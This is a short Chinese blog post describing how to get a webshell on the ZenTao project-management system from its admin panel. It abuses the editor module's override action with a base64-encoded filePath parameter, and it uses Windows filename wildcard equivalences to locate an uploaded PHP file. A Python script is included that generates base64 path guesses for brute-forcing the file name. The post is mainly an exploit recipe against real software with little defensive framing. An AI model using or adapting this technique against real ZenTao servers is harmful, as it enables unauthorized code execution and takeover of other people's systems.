禅道后台getshell(利用windows特性,快速确定文件名)

  • A+
所属分类:颓废's Blog
摘要

开始

python生成字典(需自己构造):

本文作者baozi|学与用

window特性: 双引号(""") <==> 点号(".")'; 大于符号(">") <==> 问号("?")'; 小于符号("<") <==> 星号("*")';

开始

index.php ?m=editor &f=edit &filePath=YWFh &action=override &isExtends=

filepath参数可控,填写绝对路径+base64编码

禅道后台getshell(利用windows特性,快速确定文件名)

python生成字典(需自己构造):

#!/usr/bin/env python # -*- coding: utf-8 -*- import base64,string  s="D:/ZenTaoPMS/xampp/zentao/www/data/upload/1/201707/3114144004131ln" s1="<<<<<<<<<<<<<<.php"  for word in string.lowercase:     print base64.b64encode(s+word+s1) for i in range(0,10):     print base64.b64encode(s+str(i)+s1)

之后便可找到文件位置:

禅道后台getshell(利用windows特性,快速确定文件名)

本文作者baozi|学与用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: